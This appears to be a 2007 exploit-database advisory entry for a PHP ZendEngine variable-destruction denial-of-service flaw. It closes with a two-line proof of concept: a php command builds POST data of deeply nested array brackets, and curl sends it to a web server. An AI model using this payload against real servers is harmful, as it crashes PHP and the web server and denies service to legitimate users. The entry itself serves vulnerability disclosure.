PHP 345 - ZendEngine Variable Destruction Remote Denial of Service

2007-03-01T00:00:00
ID EXPLOITPACK:AD3CDA911296E8A81D5B4059721FC97F
Type exploitpack
Reporter Stefan Esser
Modified 2007-03-01T00:00:00

Description

PHP 345 - ZendEngine Variable Destruction Remote Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/22764/info

PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.

An attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.

This issue affects all versions of PHP. 

$ php -r 'echo "a".str_repeat("[]",200000)."=1&a=0";' > postdata

$ curl http://www.example.com/ -d @postdata